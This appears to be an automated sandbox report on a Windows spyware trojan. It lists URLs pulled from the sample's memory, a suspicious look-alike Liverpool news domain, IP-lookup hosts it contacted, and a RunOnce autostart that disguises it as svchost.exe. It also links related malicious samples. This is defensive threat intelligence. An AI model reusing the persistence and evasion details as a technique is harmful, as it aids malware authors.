                                        https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpfalse
                                          		high
                                          https://i2-prod.liverpool.comlfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://felix.data.tm-awx.com/felix.min.jslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.liverpool.com/all-about/ozan-kabaklfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.526440831.00000000049BB000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpfalse
                                            		high
                                            https://s2-prod.mirror.co.uk/lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/champions-leaguelfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/curtis-joneslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/steven-gerrardlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://schema.org/NewsArticlelfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.liverpool.com/schedule/lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.liverpool.com/liverpool-fc-news/featureslfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schema.org/BreadcrumbListlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                		high
                                                https://securepubads.g.doubleclick.net/tag/js/gpt.jslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://contoso.com/Licensepowershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://s2-prod.liverpool.com/lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://myliverpoolnews.cf4&llfQuSBwdSf.exe, 00000000.00000002.345654171.00000000030F0000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  https://felix.data.tm-awx.com/ampconfig.json&quot;lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schema.org/ListItemlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://www.liverpool.com/all-about/georginio-wijnaldumlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://mab.data.tm-awx.com/rhs&quot;lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://felix.data.tm-awx.comlfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contoso.com/powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.liverpool.com/all-about/andrew-robertsonlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.liverpool.com/lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://myliverpoolnews.cflfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.liverpool.com/all-about/transferslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    162.88.193.70
                                                    		checkip.dyndns.comUnited States
                                                    		33517DYNDNSUSfalse
                                                    104.21.56.119
                                                    		myliverpoolnews.cfUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    172.67.188.154
                                                    		freegeoip.appUnited States
                                                    		13335CLOUDFLARENETUSfalse

                                                    Private

                                                    IP
                                                    192.168.2.1
                                                    127.0.0.1

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:383847
                                                    Start date:08.04.2021
                                                    Start time:11:00:51
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 19m 21s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:lfQuSBwdSf.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:40
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@49/25@11/5
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 6.8% (good quality ratio 1.4%)
                                                    • Quality average: 11.3%
                                                    • Quality standard deviation: 23.3%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 23.54.113.53, 52.255.188.83, 40.88.32.150, 104.43.193.48, 95.100.54.203, 168.61.161.212, 20.82.210.154, 13.64.90.137, 93.184.221.240, 23.10.249.26, 23.10.249.43, 13.88.21.125, 20.54.26.129, 20.50.102.62, 52.155.217.156
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    11:02:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIln C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                    11:02:04API Interceptor2x Sleep call for process: svchost.exe modified
                                                    11:02:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIln C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                    11:02:38API Interceptor1x Sleep call for process: WerFault.exe modified
                                                    11:02:55API Interceptor130x Sleep call for process: powershell.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    162.88.193.70RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    SER09090899.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    MUYR09080.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    PURCHASE ORDER-34002174, pdf.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    Order CG-210331-1004.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    Invoice,PDF.exe.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    ej 9999999.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    DHL FINAL REMINDER PDF.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    Statement For Month..exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    New Revised.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    PO_3351_60_20.docGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    SMA0908800.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    SecuriteInfo.com.ArtemisCEDC6E147EF2.27473.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    NEW ORDER.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    INV0000075.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    SWIFT COPY.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    tRuJwJgMos.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    RfTQP.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    Payment advice IMG_417_302_680.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/
                                                    A7aLfLs0oa.exeGet hashmaliciousBrowse
                                                    • checkip.dyndns.org/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    myliverpoolnews.cfRFQ-034.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    ACdEbpiSYO.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    Invoice_ord00000009.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    kayo.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    new_order20210408_14.docGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    BL01345678053567.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    new_order20210408_14.docGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    items list.docGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    SKMC25832100083932157.jarGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    PO75773937475895377.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    New Order.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    RFQ #46200058149.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    Payment Slip E05060_47.docGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    New Orders.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    freegeoip.appPURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    SER09090899.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    PURCHASE ORDER-34002174,pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    cricket.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    EMPRESA SUMPEX TRADE.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    Dringende RFQ_AP75887658_98788,pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    MUYR09080.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    PURCHASE ORDER-34002174, pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    Order CG-210331-1004.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    Yeni siparis _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    Invoice,PDF.exe.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    Payment Slip E05060_47.docGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    Confirmation_(#1422) DEKRA order,pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    ATTACHED.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    Urgent RFQ_AP65425652_040621,pdf.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    CLOUDFLARENETUSAQJEKNHnWK.exeGet hashmaliciousBrowse
                                                    • 23.227.38.74
                                                    hvEop8Y70Y.exeGet hashmaliciousBrowse
                                                    • 172.67.219.254
                                                    RFQ-034.exeGet hashmaliciousBrowse
                                                    • 104.21.56.119
                                                    ACdEbpiSYO.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    Invoice_ord00000009.exeGet hashmaliciousBrowse
                                                    • 172.67.150.212
                                                    PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
